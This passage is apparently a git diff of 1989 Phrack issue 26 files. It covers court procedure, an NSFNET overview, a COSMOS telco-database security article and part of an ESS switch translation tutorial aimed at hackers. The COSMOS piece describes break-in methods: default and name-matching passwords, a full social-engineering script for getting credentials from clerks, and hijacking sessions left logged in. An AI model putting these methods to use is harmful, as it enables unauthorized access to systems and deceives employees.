+when the formal charges are read to the suspect in front of the judge, bail is
+set if it has not been already, and the suspect may pick if he wants a jury
+trial or a trial by judge.  This, of course, assumes that the suspect is going
+to plead not guilty, which is the best thing to do in most cases of somewhat
+major capacity.  Further court dates are also set at this time.  If the suspect
+is unable to afford to retain an attorney, the court will assign a court
+appointed lawyer at this time.
+     After the arraignment, the suspect is either allowed to post bail, or is
+returned to the jail to await the next court date.  His next court date,
+which is the omnibus, is usually slated for about a month away.
+     If the set bail seems unreasonably high, your attorney can file for a
+"bond reduction."  You will go in front of the judge and your lawyer will argue
+as to why your bond should be reduced, and how you have a stable life and
+responsibilities and would not try to skip bail.  The prosecutor will argue as
+to why your bail should not be dropped.
+     At the omnibus hearing, also known as a "fact-finding" hearing (or in some
+states, this is known as the "preliminary hearing."--Ed.) the suspect is again
+brought in front of a judge, along with his own attorney, and the prosecuting
+attorney.  At this time the state (meaning the prosecutor) will reveal evidence
+against the suspect, and the judge will decide if the evidence is enough to
+hold the suspect in jail or to continue the case to trial.  Nearly always there
+is enough, as warrants would not be issued if there was not, since the state
+could be opening themselves up to a false arrest suit if they were wrong.  From
+here a "pre-trial" date is slated, again usually about a month down the road.
+     The pre-trial is the last chance for the suspect to change his mind and
+enter a guilty plea, or to continue to trial.  It is also the last point in
+which the prosecutor will offer the suspect any type of plea-bargain, meaning
+that the suspect enters a guilty plea in exchange for an agreed upon set of
+reduced charges or sentencing.  Assuming the suspect still wishes to enter a
+plea of "not-guilty," the date for jury selection will be slated.
+     During the jury selection, your lawyer and you as well as the prosecutor
+will get to meet as many prospective jury members as you wish, and you can each
+ask them questions and either accept or reject them based on if you think that
+they would be fair towards you.  This eliminates most possibilities of any jury
+members that are biases before they every sit down to hear your case.  After
+the prosecutor and your attorney agree on the members, your trial date is set,
+usually about a week later.
+     At trial, the prosecutor will present the case to the jury, starting with
+questioning detectives and investigators on how the case was first discovered
+and how things lead to you, and in each instance, your attorney will be able to
+"cross-examine" each witness and ask questions of their own, hopefully making
+the jury questionable as to the validity of everything that is said.  After
+that, your attorney is allowed to call witnesses and the prosecutor will be
+allowed to ask questions as well.  By rights you do not have to go to the stand
+if you do not want to, as you have the right to not incriminate yourself. After
+all is said and done, the prosecutor will get to state his "closing arguments,"
+a basic summary of all that was presented and why you should be considered
+guilty, and your lawyer will give his arguments to the jury, as to why you
+should not be judged guilty.
+     The jury will go into deliberation, which can last a few minutes, or
+several days.  They must all vote and decide if you should be judged guilty or
+not guilty.  After the deliberation, court is called back in and the jury will
+announce the results.
+     If it is decided that you are guilty, you normally have about 10 days to
+file an appeal, which would have your case sent to a higher court.  Otherwise
+your date for sentencing will be set, again usually about a month away.
+     At the sentencing, your lawyer will argue why you should be let off easy,
+and the prosecutor will argue why you should be given a hard sentence.  The
+judge will come to a decision based on the arguments and then make a decision
+on your sentence.  You will then be released to the agency that you are
+assigned to, be it the probation department, the prison system, or the county
+jail.
+
+     I hope this file gives you a more clear view on what happens in the legal
+system, in future files I hope to discuss the actual dos and don'ts of the
+legal system and advise as to what tricks of the trade are used by legal
+authorities.
+
+     Any questions/comments/threats can be directed to me at;
+
+                        Lunatic Labs      415.278.7421
+
+
+                                             -The Disk Jockey
+
+Written exclusively for Phrack Newsletter, 1989.  This document may be used in
+whole or part as long as full credit for work cited is given to the author.
diff --git a/phrack26/4.txt b/phrack26/4.txt
new file mode 100644
index 0000000..5a99af6
--- /dev/null
+++ b/phrack26/4.txt
@@ -0,0 +1,182 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 26, File 4 of 11
+
+                   The Future Transcendent Saga continues...
+              ___________________________________________________
+             | |                                               | |
+             | |                    NSFnet                     | |
+             | |                                               | |
+             | |      National Science Foundation Network      | |
+             | |                                               | |
+             | |               brought to you by               | |
+             | |                                               | |
+             | |               Knight Lightning                | |
+             | |                                               | |
+             | |                April 16, 1989                 | |
+             |_|_______________________________________________|_|
+
+
+       NSF Network Links Scientific Community And SuperComputer Centers
+
+When the National Science Foundation (NSF) established its national
+supercomputer centers in 1985, it also planned to create a communications
+network that would give remote locations access to these state-of-the-art
+facilities.  NSF planners envisioned a system they dubbed "NSFNET."  Based on a
+"backbone" connecting the supercomputer centers, NSFNET would combine existing
+networks and newly created ones into an InterNet, or network of networks, to
+serve the centers and their users.  In addition to gaining access to the
+centers' computing technology, researchers at geographically dispersed
+locations would be part of a nationwide research network across which they
+could exchange scientific information.  Although the primary role of NSFNET
+remains access to NSF-funded supercomputers and other unique scientific
+resources, its use as a general-purpose network, which enables scientists to
+share research findings, is becoming increasingly important.
+
+
+NSFnet Components
+%%%%%%%%%%%%%%%%%
+NSFNET is organized as a three-level hierarchy:  The backbone; autonomously
+administered wide-area networks serving communities of researchers; and campus
+networks.  The backbone has been in use since July 1986 and is fully
+operational.  It provides redundant paths among NSF supercomputer centers.
+While several wide-area networks are already connected to the NSFNET backbone,
+more are being built with partial funding from NSF and will be connected as
+they are completed (see the section on NSFnet Component Networks).
+
+
+SuperComputer Centers
+%%%%%%%%%%%%%%%%%%%%%
+NSF created the supercomputer centers in response to a growing concern that a
+lack of access to sophisticated computing facilities had severely constrained
+academic research.  A project solicitation in June 1984 resulted in the
+creation of the following centers -- the John Von Neumann National
+Supercomputer Center in Princeton, New Jersey, the San Diego Supercomputer
+Center on the campus of the University of California at San Diego, the National
+Center for Supercomputing Applications at the University of Illinois, the
+Cornell National Supercomputer Facility at Cornell University, and the
+Pittsburgh Supercomputing Center under joint operation by Westinghouse Electric
+Corporation, Carnegie-Mellon University, and the University of Pittsburgh.  All
+the centers are multi-disciplinary and are available to any researcher who is
+eligible for NSF support.  They offer access to computers made by Cray
+Research, Inc., Control Data Corporation, ETA, and IBM.  The Scientific
+Computing Division of the National Center for Atmospheric Research is the sixth
+center which is part of NSFNET.  The SCD has been providing advanced computing
+services to the atmospheric sciences community since the late 1960s.
+
+
+Protocols
+%%%%%%%%%
+NSFNET is using the TCP/IP protocols of the DARPA InterNet as the initial
+standard.  The system will work toward adopting international standards as they
+become established.  The protocols link networks that are based on different
+technologies and connection protocols, and provide a unified set of transport
+and application protocols.  As the NSFNET system continues to evolve, the
+typical user working at a terminal or work station will be able to connect to
+and use various computer resources -- including the supercomputer centers -- to
+run interactive and batch jobs, receive output, transfer files, and communicate
+with colleagues throughout the nation via electronic mail.  Most researchers
+will have either a terminal linked to a local super-minicomputer or a graphics
+work station.  These will be connected to a local area network that is
+connected to a campus network, and, via a gateway system, to a wide-area
+network.
+
+
+Management
+%%%%%%%%%%
+Four institutions are sharing the interim management of NSFNET:  The University
+of Illinois (overall project management and network engineering), Cornell
+University (network operations and initial technical support), the University
+of Southern California Information Sciences Institute (protocol enhancement and
+high-level technical support), and the University Corporation for Atmospheric
+Research (management of the NSF Network Service Center through a contract with
+BBN Laboratories, Inc.).
+
+
+NSF Network Service Center
+%%%%%%%%%%%%%%%%%%%%%%%%%%
+The NSF Network Service Center (NNSC) is providing general information about
+NSFNET, including the status of NSF-supported component networks and
+supercomputer centers.  The NNSC, located at BBN Laboratories Inc. in
+Cambridge, MA, is an NSF-sponsored project of the University Corporation for
+Atmospheric Research.
+
+The NNSC, which currently has information and documents on line and in printed
+form, plans to distribute news through network mailing lists, bulletins,
+newsletters, and on-line reports.  The NNSC also maintains a database of
+contact points and sources of additional information about the NSFNET component
+networks and supercomputer centers.
+
+When prospective or current users do not know whom to call concerning their
+questions about NSFNET use, they should contact the NNSC.  The NNSC will answer
+general questions, and, for detailed information relating to specific
+components of NSFNET, will help users find the appropriate contact for further
+assistance.
+
+In addition the NNSC will encourage the development and identification of local
+campus network technical support to better serve NSFNET users in the future.
+
+
+Connecting To NSFnet
+%%%%%%%%%%%%%%%%%%%%
+NSFNET is part of a collection of interconnected IP-networks referred to
+as the InterNet.  IP, the Internet Protocol, is a network protocol which allows
+heterogeneous networks to combine into a single virtual network.  TCP, the
+Transmission Control Protocol, is a transport protocol which implements the
+packet loss and error-detection mechanisms required to maintain a reliable
+connection between two points on the network.  TCP/IP therefore offers reliable
+delivery of data between heterogeneous computers on diverse networks.  An
+example of an application which uses TCP/IP is TELNET, which provides virtual
+terminal service across the network.
+
+Only IP-based networks can connect to the Internet; therefore, an organization
+that plans to use NSFnet either must have an existing IP network or have access
+to one.  Many large universities and technical firms have links to the InterNet
+in place.  The computer science department of a university or the engineering
+support division of a company are most likely to have IP connectivity or to
+have information on the local connections that exist.  Prospective users can
+ask the NNSC to determine whether an organization is already connected to the
+Internet.
+
+If an organization does not have an IP link, it can obtain one in several ways:
+
+     *NSF has a program that funds the connecting of organizations to the
+      NSF regional/state/community networks that are part of NSFNET.  The
+      NNSC has more information on this program.
+
+     *The Computer Science Network, CSNET, provides gateway service to
+      several IP-networks, including NSFNET.  To get CSNET service, an
+      organization must become a CSNET member.
+
+     *Users may be able to get access to NSFNET through time-share
+      accounts on machines at other organizations, such as local
+      universities or companies.
+
+Some supercomputer centers support access systems other than NSFNET,
+such as Bitnet, commercial X.25 networks, and dial-up lines, which do not
+use IP-based protocols.  The Supercomputer Centers' user services
+organizations can provide more information on these alternatives (see
+list).
+
+NSF COMPONENT NETWORKS
+
+STATE AND REGIONAL NETWORKS
+
+    BARRNET (California's Bay Area Regional Research Network)
+    MERIT  ( Michigan Educational Research Network)
+    MIDNET  (Midwest Network)
+    NORTHWESTNET (Northwestern states)
+    NYSERNET (New York State Educational and Research Network)
+    SESQUINET  (the Texas Sesquicentennial Network)
+    SURANET  (the Southeastern Universities Research Association Network)
+    WESTNET  (Southwestern states)
+
+
+CONSORTIUM NETWORKS
+
+    JVNCNET connects the John Von Neumann National Supercomputer Center
+       at Princeton, NJ, with a number of universities.
+    PSCAANET is the network of the Pittsburgh Supercomputing Center
+       Academic Affiliates group.
+    SDSCNET is centered at the San Diego Supercomputer Center.
+_______________________________________________________________________________
diff --git a/phrack26/5.txt b/phrack26/5.txt
new file mode 100644
index 0000000..ed88332
--- /dev/null
+++ b/phrack26/5.txt
@@ -0,0 +1,227 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 26, File 5 of 11
+
+                                    COSMOS
+
+                   COmputer System for Mainframe OperationS
+
+                                   Part One
+
+                                by King Arthur
+
+Introduction
+%%%%%%%%%%%%
+
+     Throughout the last decade, computers have played an ever growing role in
+information storage and retrieval.  In most companies, computerized databases
+have replaced a majority of all paper records.  Where in the past it would take
+10 minutes for someone to search through stacks of paper for some data, the
+same information can now be retrieved from a computer in a fraction of a
+second.
+
+     Previously, proprietary information could be considered "safe" in a file
+cabinet; the only way to see the data would be to have physical access to the
+files.  Now, somebody with a computer terminal and a modem can make a quick
+phone call and access private records.  It's unfortunate that there are
+"hackers" who try to gain unauthorized access to computers.  Yet, it is just as
+unfortunate that most reported computer break-ins could have been prevented if
+more thought and common sense went into protecting computers.
+
+
+Hackers
+%%%%%%%
+     There have been many cases of computer crime reported by the Bell
+Operating Companies (BOCs), but it is hard to say how many actual break-ins
+there are.  Keep in mind that the only reported cases are those which are
+detected.  In an interview with an anonymous hacker, I was told of one of the
+break-ins that may not have ever been reported.  "My friend got the number when
+he misdialed his business office -- that's how we knew that it was the phone
+company's.  It seems this Unix was part of some real big Bellcore computer
+network," says the hacker.
+
+     The hacker explains that this system was one of many systems used by the
+various BOCs to allow large Centrex customers to rearrange their Centrex
+groups.  It seems he found a text file on the system with telephone numbers and
+passwords for some of Bellcore's development systems.  "On this Bellcore system
+in Jersey, called CCRS, we found a list of 20 some-odd COSMOS systems....
+Numbers, passwords, and wire centers from all over the country!"  He adds,
+"Five states to be exact."
+
+     The hacker was able to gain access to the original Unix system because, as
+he says, "Those guys left all the default passwords working."  He was able to
+login with a user name of "games" with the password being "games."  "Once we
+were on we found that a large number of accounts didn't have passwords.  Mary,
+John, test, banana, and system were some, to name a few."  From there he was
+able to eventually access several COSMOS database systems -- with access to ALL
+system files and resources.
+
+COSMOS
+%%%%%%
+     COSMOS, an acronym for the COmputer System for Mainframe OperationS, is a
+database package currently supported by Bellcore.  COSMOS is presently being
+used by every BOC, as well as by Cincinnati Bell and Rochester Telephone.
+COSMOS replaces paper record-keeping and other mechanized record systems for
+plant administration.  COSMOS' original purpose was to alleviate congestion in
+the Main Distributing Frame (MDF) by maintaining the shortest jumpers.
+
+     It can now maintain load balance in a switch and assign office equipment,
+tie pairs, bridge lifters and the like.  Additional applications allow COSMOS
+to aid in "cutting-over" a new switch, or even generate recent change messages
+to be input into electronic switches.  COSMOS is most often used for
+provisioning new service and maintaining existing service, by the following
+departments:  The frame room (MDF), the Loop Assignment Center (LAC), the
+Recent Change Memory Assistance Center (RCMAC), the network administration
+center, and the repair service.
+
+     Next year COSMOS will celebrate its 15th birthday, which is quite an
+accomplishment for a computer program.  The first version or "generic" of
+COSMOS was released by Bell Laboratories in 1974.  In March 1974, New Jersey
+Bell was the first company to run COSMOS, in Passaic, New Jersey. Pacific
+Telesis, NYNEX,  Southern Bell, and many of the other BOCs adopted COSMOS soon
+after.  Whereas Southwestern Bell waited until 1977, the Passaic, NJ Wire
+Center is still running COSMOS today.
+
+     Originally COSMOS ran on the DEC PDP 11/45 minicomputer.  The package was
+written in Fortran, and ran the COSNIX operating system.  Later it was adapted
+to run on the DEC PDP 11/70, a larger machine.  Beverly Cruse, member of
+Technical Staff, COSMOS system design at Bellcore, says, "COSNIX is a
+derivation of Unix 1.0, it started out from the original Unix, but it was
+adapted for use on the COSMOS project.  It bears many similarities to Unix, but
+more to the early versions of Unix than the current...  The COSMOS application
+now runs on other hardware understandard Unix."
+
+     "The newest version of COSMOS runs on the standard Unix System V operating
+system.  We will certify it for use on particular processors, based on the
+needs of our clients," says Ed Pinnes, the District Manager of COSMOS system
+design at Bellcore.  This Unix version of COSMOS was written in C language.
+Currently, COSMOS is available for use on the AT&T 3B20 supermini computer,
+running under the Unix System V operating system.  "There are over 700 COSMOS
+systems total, of which a vast majority are DEC PDP 11/70's.  The number
+fluctuates all the time, as companies are starting to replace 11/70's with the
+other machines," says Cruse.
+
+     In 1981 Bell Laboratories introduced an integrated systems package for
+telephone companies called the Facility Assignment Control System (FACS).  FACS
+is a network of systems that exchanges information on a regular basis.  These
+are: COSMOS, Loop Facilities Assignment and Control System (LFACS), Service
+Order Analysis and Control (SOAC), and Work Manager (WM).  A service order from
+the business office is input in to SOAC.  SOAC analyzes the order and then
+sends an assignment request, via the WM, to LFACS.  WM acts as a packet switch,
+sending messages between the other components of FACS.  LFACS assigns
+distribution plant facilities (cables, terminals, etc.) and sends the order
+back to SOAC.  After SOAC receives the information form LFACS, it sends an
+assignment request to COSMOS.  COSMOS responds with data for assigning central
+office equipment:  Switching equipment, transmission equipment, bridge lifters,
+and the like.  SOAC takes all the information from LFACS and COSMOS and appends
+it to the service order, and sends the service order on its way.
+
+Computer Security
+%%%%%%%%%%%%%%%%%
+     Telephone companies seem to take the brunt of unauthorized access
+attempts.  The sheer number of employees and size of most telephone companies
+makes it very difficult to keep tabs on everyone and everything.  While
+researching computer security, it has become evident that COSMOS is a large
+target for hackers.  "The number of COSMOS systems around, with dial-ups on
+most of the machines... makes for a lot of possible break-ins,"  says Cruse.
+This is why it's all the more important for companies to learn how to protect
+themselves.
+
+     "COSMOS is power, the whole thing is a big power trip, man. It's like Big
+Brother -- you see the number of some dude you don't like in the computer.  You
+make a service order to disconnect it; COSMOS is too stupid to tell you from a
+real telco dude," says one hacker.  "I think they get what they deserve:
+There's a serious dearth of security out there.  If kids like us can get access
+this easily, think about the real enemy -- the Russians," jokes another.
+
+     A majority of unauthorized access attempts can be traced back to an
+oversight on the part of the system operators; and just as many are the fault
+of the systems' users.  If you can keep one step ahead of the hackers,
+recognize these problems now, and keep an eye out for similar weaknesses, you
+can save your company a lot of trouble.
+
+     A hacker says, "In California, a friend of mine used to be able to find
+passwords in the garbage.  The computer was supposed to print some garbled
+characters on top of the password. Instead the password would print out AFTER
+the garbled characters."   Some COSMOS users have half duplex printing
+terminals.  At the password prompt COSMOS is supposed to print a series of
+characters and then send backspaces.  Then the user would enter his or her
+password.  When the password is printed on top of the other characters, you
+can't see what it is.  If the password is being printed after the other
+characters, then the printing terminal is not receiving the back space
+characters properly.
+
+     Another big problem is lack of password security.  As mentioned before,
+regarding CCRS, many accounts on some systems will lack passwords.  "On COSMOS
+there are these standardized account names.  It makes it easier for system
+operators to keep track of who's using the system.  For instance: all accounts
+that belong to the frame room will have an MF in them.  Like MF01, you can tell
+it belongs to the frame room.  (MF stands for Main Frame.)  Most of these names
+seem to be common to most COSMOS systems everywhere.  In one city, none of
+these user accounts have passwords.  All you need is the name of the account
+and you're in.  In another city, which will remain unnamed, the passwords are
+the SAME AS THE DAMN NAMES!  Like, MF01 has a password of MF01.  These guys
+must not be very serious about security."
+
+     One of the biggest and in my eyes one of the scariest problems around is
+what hackers refer to as "social engineering".  Social engineering is basically
+the act of impersonating somebody else for the sake of gaining proprietary
+information.  "I know this guy.  He can trick anybody, does the best BS job
+I've ever seen.  He'll call up a telco office, like the repair service bureau,
+that uses COSMOS.  We found that most clerks at the repair service aren't too
+sharp."  The hacker said the conversation would usually take the following
+course:
+
+Hacker:  Hi, this is Frank, from the COSMOS computer center.   We've had a
+         problem with our records, and I'm wondering if you could help me?
+
+Telco:   Oh, what seems to be the problem?
+
+H:  We seem to have lost some user data.  Hopefully, if I can correct the
+    problem, you people won't lose any access time today.  Could you tell me
+    what your system login name is?
+
+T:  Well, the one I use is RS01.
+
+H:  Hmm, this could present a problem.  Can you tell me what password and wire
+    center you use that with?
+
+T:  Well, I just type s-u-c-k-e-r for my password, and my wire centers are: TK,
+    KL, GL, and PK.
+
+H:  Do you call into the system, or do you only have direct connect terminals?
+
+T:  Well, when I turn on my machine I get a direct hook up.  It just tells me
+    to login.  But I know in the back they have to dial something.  Hold on,
+    let me check.  (3 Minutes later...)  Well, she says all she does is call
+    555-1212.
+
+H:  OK, I think I have everything taken care of.  Thanks, have a nice day.
+
+T:  Good, so I'm not gonna have any problems?
+
+H:  No, but if you do just give the computer center a call, and we'll take care
+    of it.
+
+T:   Oh, thank you honey.  Have a nice day now.
+
+     "It doesn't work all the time, but we get away with it a good part of the
+time.  I guess they just don't expect a call from someone who isn't really part
+of their company,"  says the hacker.  "I once social engineered the COSMOS
+control center.  They gave me dial-ups for several systems, and even gave me
+one password.  I told them I was calling from the RCMAC and I was having
+trouble logging into COSMOS," says another.
+
+     This last problem illustrates a perfect example of what I mean when I say
+these problems can be prevented if more care and common sense went into
+computer security.  "Sometimes, if we want to get in to COSMOS, but we don't
+have the password, we call a COSMOS dial-up at about 5 o'clock.  To logoff of
+COSMOS you have to hit a CONTROL-Y.  If you don't, the next person who calls
+will resume where you left off.  A lot of the time, people forget to logoff.
+They just turn their terminals off, in the rush of going home."
+
+     The past examples do not comprise the only way hackers get into systems,
+but most of the problems shown here can exist regardless of what types of
+systems your company has.  The second article deals with solutions to these
+problems.
+_______________________________________________________________________________
diff --git a/phrack26/6.txt b/phrack26/6.txt
new file mode 100644
index 0000000..7bf944e
--- /dev/null
+++ b/phrack26/6.txt
@@ -0,0 +1,382 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 26, File 6 of 11
+
+         +-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
+
+                         Basic Concepts of Translation
+
+                               Brought to you by
+
+                                 The Dead Lord
+                                      and
+                         The Chief Executive Officers
+
+                               February 17, 1989
+
+         +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-+
+
+This tutorial is meant for the hardcore hackers who have entered the world of
+ESS switches.  The information here is useful and valuable, although not
+invaluable.  You can easily reap the benefits of access to a switch even if you
+only know RC:LINE, but to really learn the system in and out, the concepts
+about translation are ones that need to be mastered.
+
+In electromechanical switches, switching was directly controlled by whatever
+the customer dialed.  If a 5 were dialed, the selector moved across 5
+positions, and so on. There were no digit storing devices like registers and
+senders.  As the network grew larger, this became inefficient and switching
+systems using digit storage and decoding devices were put into use.  In this
+type of setup, the customer dials a number, which is stored in a register, or
+sender.  The sender then uses a decoder and gives the contents of the register
+as input.  The decoder translates the input into a format that can be used to
+complete the call, and sends this translation back to the digit storage device.
+This is a simplified example of translation, since the only input was dialed
+digits and the only output was routable information, but it shows what
+translation is:  The changing of information from one form to another.
+
+When 1 ESS was first tested in Morris, Illinois in 1960, it introduced a
+switching method called Stored Program Control.  Instead of switching and logic
+functions being handled by hardware, it was done through computer programs.
+This greatly expanded the translation function.  Because calls are handled by
+many programs, information must be provided for each program.  For example,
+when a customer picks up a phone, the switch needs to know if outgoing service
+is being denied, if the line is being observed, line class, special equipment
+features, etc.  The line equipment number is given to the translation program
+as input. The translator translates the LEN and produces the answers to these
+and other pertinent questions in a coded form that can be used by the central
+processor of the switch.
+
+If the call is an interoffice call, the first three dialed digits are given to
+a translator as input and they translate into a route index and, possibly,
+other information.  The route index, in turn, is given as input to another
+translator, which translates into:  Which trunk to use (trunk identity),
+transmitter identity, the alternate route, etc.  So actually, in early systems,
+translation was a single shot thing, and in Stored Program Control Systems
+(SPCS), the translation function is used many many times.
+
+In the 1 ESS, translation data is stored on magnetic memory cards in the
+program store.  However, since translation data is constantly being changed,
+there is a provision made to store the changes in an area of the call store
+memory.  The area of call store is called the recent change (RC) area.  The
+changes are eventually transcribed from the call store into the program store
+by a memory card writer.
+
+In the 1A ESS, translation data is stored in the unduplicated call store, with
+backup in the form of disk memory called file store.  Additionally, magnetic
+tapes are made of the translation area of call store.  When a change in
+translation is made, the change is entered in a duplicated copy of call store.
+After checks are made as to the validity of the change (format and everything),
+the change is then placed in the unduplicated copy of call store. After that,
+the change is also written to a set of disk files in file store.  Before the
+new data is written, the old data is written to a part of the disk file called
+"rollback."
+
+                  |------------|-------------|-------------|
+                  |    DATA    |  1 ESS      |   1A ESS    |
+                  |------------|-------------|-------------|
+                  | Transient  | Duplicated  | Duplicated  |
+                  |Information | Call Store  | Call Store  |
+                  |------------|-------------|-------------|
+                  |  Generic   | Duplicated  |Program Store|
+                  |  Program   |Program Store|             |
+                  |------------|-------------|-------------|
+                  | Parameter  | Duplicated  |Unduplicated |
+                  |   Table    |Program Store| Call Store  |
+                  |------------|-------------|-------------|
+                  |Translation | Duplicated  |Unduplicated |
+                  |Information |Call Store + | Call Store  |
+                  |            |Program Store|             |
+                  |------------|-------------|-------------|
+
+
+Transient Information:    Telephone calls or data messages in progress; present
+                          state of all lines, junctors, and trunks in the
+                          office.
+
+Generic Program:          The operating intelligence of the system.  It
+                          controls actions like line and trunk scanning,
+                          setting up and taking down connections, etc.
+
+Parameter Table:          Informs the generic program of the size and makeup of
+                          the office.  This information includes equipment
+                          items (frames and units), call store allocation (call
+                          registers, hoppers, queues, etc.) and office options
+                          (days AMA tapes will be switched, etc.).
+
+Translation Information:  Day to day changeable info which is accessed by
+                          translator programs.  Also includes form tables,
+                          lists called "translators" which are linked in an
+                          hierarchical pattern.
+
+This is a quote from Engineering and Operations in the Bell System, pages
+415-416:
+
+     "The 1 ESS includes a fully duplicated No. 1 Central Processor Unit
+     (Central Control includes the generic program), program store bus,
+     call store bus, program stores, and call stores.  The 1 ESS uses
+     permanent magnet twister program store modules as basic memory
+     elements.  These provide a memory that is fundamentally read only,
+     and have a cycle time of 5.5 microseconds.  The call store provides
+     "scratch pad," or temporary duplicated memory.
+
+     As with the 1 ESS, the 1A CPU has a CPU, prog store bus, and call
+     store bus that are fully duplicated.  However, the 1A processor uses
+     readable and writable memory for both prog and call stores, and has
+     a cycle time of 700 nanoseconds.  However, the program stores aren't
+     fully duplicated, but 2 spare stores are provided for reliability.
+     A portion of the call store is duplicated, but only one copy of
+     certain fault recognition programs, parameter information, and
+     translation data is provided.  An extra copy of the unduplicated
+     prog and call store is provided for in file store."
+
+The program store translation area in the 1 ESS and the unduplicated call store
+translation area in the 1A ESS contain all the info that can change from day to
+day for that office.  Here is a list of things that are stored in the
+translation area:
++ Line Equipment Number (LEN), Directory Number (DN), trunk assignments (all
+  explained later).
++ Office codes.
++ Rate and route information.
++ Traffic measurement information.
++ Associated miscellaneous info for call processing and charging.
+
+Call store can be thought of as RAM; it is filled as long as the ESS is
+powered.
+
+Program store is like ROM; it is physically written onto magnetic cards.  File
+store is simply information stored on magnetic tapes (or disk drives).  All
+data that's changeable (rate and route, customers' features, trunk selection,
+alternate paths, etc.) is called translation data and is stored in the
+translation area.
+
+Changes in translation are called recent changes and are stored in an area
+called the recent change area.
+
+Once again, I stress that this article is sort of a "masters" file for hackers
+who are interested in ESS.  If the concepts are too difficult, don't panic.
+Knowledge comes with time.  Don't feel bad if you don't catch on right away.
+
+Translation data is stored in the form of tables or lists.  Each table is
+linked in a hierarchical pattern.  Tables high in the hierarchy contain
+pointers (addresses) to the lower tables.  Tables low in the hierarchy contain
+the actual data.
+
+Most translators are broken down into subtranslators, which are linked by a
+Head Table, or "HT".  The HT points to the different ST's stored in memory, in
+the same way that a table of contents in a book points to the pages of each
+chapter. This way, when a new feature is added, it's just a matter of adding a
+new entry in the HT, and having the entry point to a newly stored ST.
+
+Translation input is divided into 2 parts: the selector and the index.  The
+selector determines which ST to access, and the index determines which item
+(word number) in that particular ST to access.  In some cases, the translation
+information may not fit into the space allotted to an ST, so pointers to
+auxiliary blocks and/or expansion tables may have to be given.  You can think
+of a BASIC program, where a GOSUB points to a subroutine at location 4000.
+Now, if the subroutine is 100 bytes long, but you only have room for 75,
+another GOSUB must be issued to point to the rest of the subroutine.  So a full
+translator is quite a large unit -- it can have a head table, subtranslators,
+auxiliary blocks, abbreviated codes, lists, subauxiliary blocks and expansion
+tables.  The example below shows a custom calling feature that exists on 5 ESS:
+Dog Control Frequency, "DCF".  In the e below diagram, DCF represents the Head
+Table, and has a list of pointers that identify the location of subtranslators
+"A" through "D".  The data field "2" in subtranslator "D" is too small to store
+the entire subroutine, so an expansion table "2A" was produced to house the
+entire program.
+
+    *  D.C.F. *  head table
+    |
+    |
+|------|-----------|--------|
+|      |           |        |
+A      B           C        D  subtranslators
+    |
+    ---1  data: tables
+    |or
+    ---2 ---->| lists
+    |         |
+    ---3      |
+    |         |
+   etc       % /  expansion
+ 2-Atable
+
+ESS programs access translators by locating their octal address in the Master
+Head Table, which is also called the Base Translator.
+
+1 ESS MHT
+%%%%%%%%%
+The 1 ESS has 2 copies of the MHT:  One in program store, and one in call
+store.  The copy in call store is the one that's used normally, since call
+store memory has a faster cycle time.  The one in program store is there for
+backup.  The MHT is 338 bytes long (23 bit bytes), and as we mentioned, is used
+as a sort of directory for locating translators.  The MHT can point to starting
+addresses of Head Tables (which point to translators), or to tables and lists.
+Head Tables point to subtranslators.  Subtranslators can point to auxiliary and
+expansion blocks, lists, or tables.
+
+There is another Master Head Table called the Auxiliary Master Head Table,
+which points to other translators.  There are 2 copies of the AMHT, one in
+program and one in call store.  The AMHT is found by accessing the MHT, and for
+those interested, the address of the AMHT is located in the 28th byte of the
+MHT.  The MHT is fixed; meaning that the first byte will ALWAYS be the address
+of the DN translator.  The last byte will ALWAYS be the address to the JNNL to
+JNNT/JCN Head Table (explained later).  ESS needs a table to read this table.
+Otherwise, how would it know what byte leads where?  There is a "T-reading
+octal program" located at (octal address) 1105615 in the parameter area in the
+program store.This address is stored in the generic program and is used to read
+the Master Head Table.
+
+1A ESS
+%%%%%%
+A 1A ESS switch call store byte contains 26 bits, named 0 through 25, which is
+a lot more than I can say about an Apple... Bits 24 and 25 are used for parity,
+and are not used for data.  This leads to what is known as a K-code.  No, a
+K-code is not used by lowly software K-rad pirates, but it is used by us ESS
+hackers.  Each call store K-code contains 65,536 bytes, and can be thought of
+as a "page" of memory.
+
+Anyway, translation data is stored in the unduplicated call store.  Remember,
+we're still talking about 1A ESS.  In generic 1AE6 and earlier, unduplicated
+call store starts at K-code 17, and as more translation data is fed into the
+system, it pushes down into K-code 16, 15, 14, etc.  In generic 7 and above,
+call store has been increased by a great deal, because of a huge memory
+expansion unit.  On the early generics, the entire call store and program store
+had to fit in 38 K-codes.  In the later generics, there are 38 K-codes assigned
+to call store (that's split between duplicated and unduplicated), and another
+38 K-codes for program store.
+
+Not all K-codes may be used, so it's not really a full 38 K-codes, but hey, you
+can't have all your memory and use it too.  Anyhow, because generics 1A E7 and
+higher have such huge call store memories, it's convenient to divide call store
+into 3 parts:  The "duplicated call store" (DCS), which is located at the very
+top of the memory map, the "low unduplicated call store," (LUCS), which is
+located in the middle of call store, and the "high unduplicated call store,"
+(HUCS).  The LUCS area starts at K-code 17 and goes down as it fills up (being
+very watchful about not going into the DCS area.  The HUCS area starts at
+K-code 37 and goes down as it fills up to K-code 20, being mindful not to step
+on LUCS's toes.  Translators are classified as being either HUCS or LUCS
+translators, (but not both).
+
+LUCS translators aren't fixed; they can exist anywhere in the area as long as
+they're identified by the MHT.  HUCS translators can either be fixed or not
+fixed.  Note that in generics 1AE6 and earlier, there is no such distinction,
+because there's not enough memory to make such a distinction feasible.  As for
+the location of the MHT, in generic 1AE6 and earlier, it's located in K-code 17
+at octal address 3724000, and is 1376 bytes long.  The later MHT's were moved
+to K-code 37 at octal address 7720000, and is 3424 bytes long.
+
+Translator Types
+%%%%%%%%%%%%%%%%
+As I said, translators take data as input and change it into another form for
+output.  All translators exist in the form of hierarchical lists and tables.
+They reside in call store on 1A's and program store on 1's.  The higher data in
+a translator points to the location of the lower data.  The lower data contains
+the actual information.  The different translators are located by the Master
+Head Table, which contains pointers to all the translators in the system.  The
+kind of data that needs to be translated is changeable data.
+
+For example:
+
+o  line equipment number
+o  directory number
+o  3/6 digit codes
+o  trunk network number to trunk group number
+o  trunk network number to peripheral equipment number
+
+Now, there are two types of translators:  Multilevel and expansion.  The
